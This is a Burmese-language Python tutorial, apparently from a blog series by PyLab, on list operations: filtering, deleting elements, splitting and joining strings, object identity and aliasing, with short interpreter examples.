ဒါဆို Map အကြောင်းဆက်ပြောဖို့ အောက်ကဥပမာကိုဆက်လေ့လာကြည့်ရအောင်…
ကျွန်တော်တို့  List ထဲမှာ small letter နဲ့ ရေးထားတဲ့ arguments တွေရှိတယ်ဆိုပါစို့ ဗျာ… ဒါတွေကို Capital Letter လေးတွေပြောင်းရအောင်…
def capitalizee(a):
   capi = []
   for x in a:
       capi.append(x.capitalize())
   return capi
ဒီ Example မှာဆို capi ဆိုတဲ့ empty list လေးတစ်ခုလုပ်လိုက်ပါတယ်။ ပြီးရင် Loop ပတ်ခိုင်းပြီးတော့ a ထဲက တစ်ခုချင်းစီကို capitalize() နဲ့ ပြောင်းပြီး capi ဆိုတဲ့ empty list ထဲကိုထည့်သွားတာပါ။
ဒါဆိုဘယ်လိုမျိုးလုပ်ဆောင်ချက်တွေလုပ်တဲ့ function ကို Filter လို့ ခေါ်လဲပြောပြပါမယ်။
namez = [‘I’, ‘love’, ‘MSF’]
def thelower(a):
   lowlist = []
   for x in a:
       if x.islower():
           lowlist.append(x)
   return lowlist
def theupper(a):
   uplist = []
   for x in a:
       if x.isupper():
           uplist.append(x)
   return uplist
ပထမတစ်ခုမှာဆို love ဆိုတာလေးပဲပြန်ပေးမှာပါ။ ဒုတိယတစ်ခုမှာတော့ I နဲ့ MSF ကိုဖော်ပြမှာပါ။ islower() ရယ် isupper() ဆိုတာက True or False ပြန်ပေးပါတယ်။ ဒါကို if နဲ့ တွဲသုံးလိုက်တော့အကယ်လို့  True ပြန်ပေးရင် if အောက်က function ဖြစ်တဲ့ append() ကိုဆက်လုပ်သွားတာပါ။ ဒီလို function မျိုးတွေကို filter  လို့ ခေါ်တာပါ။
2.8 Deleting the elements of a list
List အကြောင်းစပြောကထဲက List တွေက mutable ဖြစ်တယ်ဆိုတာကိုပြောခဲ့ပါသလို အမျိုးမျိုးလဲသုံးပြခဲ့ပါတယ်။ List တွေက mutable ဖြစ်တယ်ဆို elements တွေထည့်လိုက် sorting လုပ်တာလောက်တင်ဘယ်ကမလဲ။ မလိုတဲ့ elements တွေကိုလဲဖယ်ထုတ်ပစ်နိုင်ပါတယ်။
Delete an element using pop()
>>> a = [1, 2, 3, 4, 5, 6]
>>> b = a.pop(0) # Remember, elements counting start from 0
>>> a
[2, 3, 4, 5, 6]
>>> b
1
>>> a.pop() # If we do not provide an index, it will remove last element and return that value.
6
Delete the element using “del”
>>> a = [‘a’, ‘b’, ‘c’, ‘d’, ‘e’]
>>> del a[1]
>>> a
[‘a’, ‘c’, ‘d’, ‘e’]
Index အသုံးမပြုချင်ပဲကိုယ် delete လုပ်ချင်တဲ့ element ကိုသိတယ်ဆို remove() ကိုအသုံးပြုလို့ ရပါတယ်။
>>> a = [‘I’, ‘Love’, ‘MSF’]
>>> a.remove(‘Love’)
ဒီမှာက remove() ထဲမှာကျွန်တော်ဖျက်ချင်တဲ့ကောင်ကိုထည့်လိုက်တာပါ။ string ဆိုလဲ string ပေါ့။ integer ဆိုလဲ integer ပေါ့။ တစ်ခုမှတ်ထားရမှာက remove() က None ပဲ return ပြန်ပါတယ်။
ဒါဆို List ထဲမှာ Elements 10 ခုရှိတယ်ဗျာ။ 4 ခုမြောက်ကနေ 6 ခုမြောက်ထိဖျက်တယ်ဒါမျိုးဆိုဘယ်လိုလုပ်မလဲ? ပြောရရင် Element တစ်ခုထဲမပာုတ်ပဲ အများကြီးကိုတခါထဲနဲ့ ဖျက်ချင်ရင်ပေါ့။ ကျွန်တော်ဥပမာလေးပြပါမယ်။
>>> a = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
>>> del a[3:6]
>>> a
[1, 2, 3, 7, 8, 9, 10]
ကျွန်တော်အပေါ်မှာရေးပြခဲ့သလို index slicing ကို del နဲ့ တွဲသုံးလို့ ရပါတယ်။
2.9 Lists and strings
Characters တွေကိုအစဉ်လိုက်စုလိုက်ရင် String ပါ။ Values တွေကိုအစဉ်လိုက်စုလိုက်ရင် List ပေါ့ ဒါပေသိ List of Character တွေသည် String တစ်ခုမပာုတ်ပါ။ String တစ်ခုကို List ပြောင်းချင်ရင် list() ဆိုတာကိုအသုံးပြုနိုင်ပါတယ်။ အောက်မှာ abc ဆိုတဲ့ beer အဲလေ string လေးကို List ပြောင်းပြပါမယ်။
>>> a = ‘abc’
>>> thelist = list(a)
>>> thelist
[‘a’, ‘b’, ‘c’]
list() ဆိုတဲ့ function က string ထဲက character ကို letter တစ်ခုချင်းစီပြောင်းလိုက်ပါတယ်။ နောက် string တစ်ခုကိုခွဲထုတ်ချင်ရင် split() ဆိုတဲ့ function ကိုအသုံးပြုနိုင်ပါတယ်။
>>> a = ‘I Love MSF’
>>> b = a.split()
>>> b
[‘I’, ‘Love’, ‘MSF’]
နေအုံးဗျ အဲ့ဒီ split() ဆိုတဲ့ function မှာ option character ရှိပါတယ်။ ဘယ်လိုသုံးတယ်ဆိုတာဥပမာလေးနဲ့ ပြပါတယ်။
>>> a = ‘Hello-World-MSF’
>>> b = a.split(‘-‘)
>>> b
[‘Hello’, ‘World’, ‘MSF’]
Option character ရဲ့သဘောတရားကဆိုရင်ကိုယ်ထည့်လိုက်တဲ့ argument ကိုဖယ်ပြီးအဲ့ကောင်ကနေပဲခွဲခွဲသွားမှာဖြစ်ပါတယ်။ ရှင်းသွားအောင်နောက်ဥပမာလေးလုပ်ရအောင်။
>>> a = ‘Hello World! MSF’
>>> b = a.split(‘!’)
>>> b
[‘Hello World’, ‘MSF’]
သဘောပေါက်မယ်ထင်ပါတယ်။
split() နဲ့ ခွဲလိုက်တာတော့ပာုတ်ပြီဗျာ…. ပာာပော့လူ..မကျေနပ်ဘူးပြန်ပေါင်းချင်တယ်ဗျာ။ ဘယ်လိုလုပ်ရမလဲဆိုတော့သူရဲ့ပြောင်းပြန် join() ဆိုတာရှိပါတယ်။ အောက်ကဥပမာလေးကြည့်လိုက်ရအောင်…
>>> a = [‘Hello’, ‘World’, ‘MSF’]
>>> b = ‘ ‘ #There is a space between two single quotes
>>> b.join(a)
‘Hello World MSF’
မြင်တယ်မလားမသိ space နေရာမှာကိုယ်ဆက်ချင်တာကိုထည့်နိုင်ပါတယ်။
2.10 Objects and Values
Interpreter မှာဒီိလိုလေးရေးလိုက်ပါ။
>>> a = ‘MSF’
>>> b = ‘MSF’
>>> c = [1, 2, 3]
>>> d = [1, 2, 3]
Variable တွေဖြစ်တဲ့ a ကော b ကောက MSF ဆိုတာတော့လူတိုင်းကြည့်တာနဲ့ သိပါတယ် ဒါပေသိ string တစ်ခုထဲကိုပဲရည်ညွှန်းထားတာလားဆိုတာကိုတော့မသိဘူးဗျာ။ မသိတော့ဘာလုပ်မလဲ? အဖြေရှာမှာပေါ့ဗျာ…. ဒီလိုအဖြေရှာဖို့ အတွက် Object တူမတူရှာမယ် ဒီလို Object တူမတူကိုသိဖို့ အတွက် is ဆိုတာလေးကိုအသုံးပြုကြပါမယ်။
a နဲ့  b ကိုအရင်ရှင်းမယ်ဗျာ။
>>> a is b
True
a နဲ့  b ကို is နဲ့ အဖြေထုတ်တာ True ဆိုတော့ Object တူပါတယ်။ အောက်ကပုံလေးနဲ့ မြင်အောင်ဆွဲပြပေးထားပါတယ်။
ဒါဆိုနောက်တစ်ခုထပ်ပြောရအောင်…
>>> c is d
False
သဘောပေါက်မယ်ထင်ပါတယ်။ c နဲ့  d က value တူပေမယ့် မတူညီတဲ့ objects တွေကိုရည်ညွှန်းထားတာပါ။
2.11 Aliasing
a = b ဆိုရင် same object ကိုပဲ refer လုပ်တယ်ဆိုတာကိုတော့သိပြီးသားဖြစ်မှာပါ။
Object တစ်ခုမှာ refer လုပ်တာ၁ခုထက်ပိုရင် name ကလဲတစ်ခုထက်ပိုပါပဲ။ ဒီလို object ကို alias လို့ ခေါ်ပါတယ်။ အကယ်လို object ကသာ List တွေလို mutable ဖြစ်ခဲ့ရင် a ကိုချိန်းရင် b မှာလဲသက်ရောက်မှုရှိတယ်ဆိုတာကိုအရင်သင်ခန်းစာမှာထဲကသိပြီးလောက်ပြီဖြစ်ပါတယ်။ Recall ပြန်ခေါ်ရမယ်ဆို
>>> a = [1, 2, 3]
>>> b = a
>>> b[0] = 11
>>> a
[11, 2, 3]
Alias က strings တွေလို immutable တွေဆိုဘာမှမဖြစ်ပေမယ့် List တို့ လို mutable တွေကျသတိထားရပါတယ်။ ဒီလို List တွေကို changes လုပ်ရင် တစ်ခုချိန်းရင်နောက်တစ်ခုမှ changes မဖြစ်စေချင်ရင်အသုံးပြုလို့ ရတဲ့နည်းကိုအရင်အပိုင်း ၂ မှာပြောပြပြီးသားပါ။ သိအုံးမယ်ထင်ပါတယ်။ (မေ့သွားရင်တော့ပြန်ဖတ်ပေါ့လေ)
Let’s Write Python [2.5] ကတော့ဒီလောက်ပါပဲ။ နောက်အပိုင်း ၃ကျရင် Tuple တွေအကြောင်းကိုလေ့လာကြပါမယ်။ ကျွန်တော်ဘာလို့  [3] လို့ မစပဲ [2.5] လို့ ရေးလဲဆို ဒီအခန်းကရှေ့ ကအခန်းရဲ့အဆက်ဖြစ်နေလို့ ပါ။
(c) PyLab 2016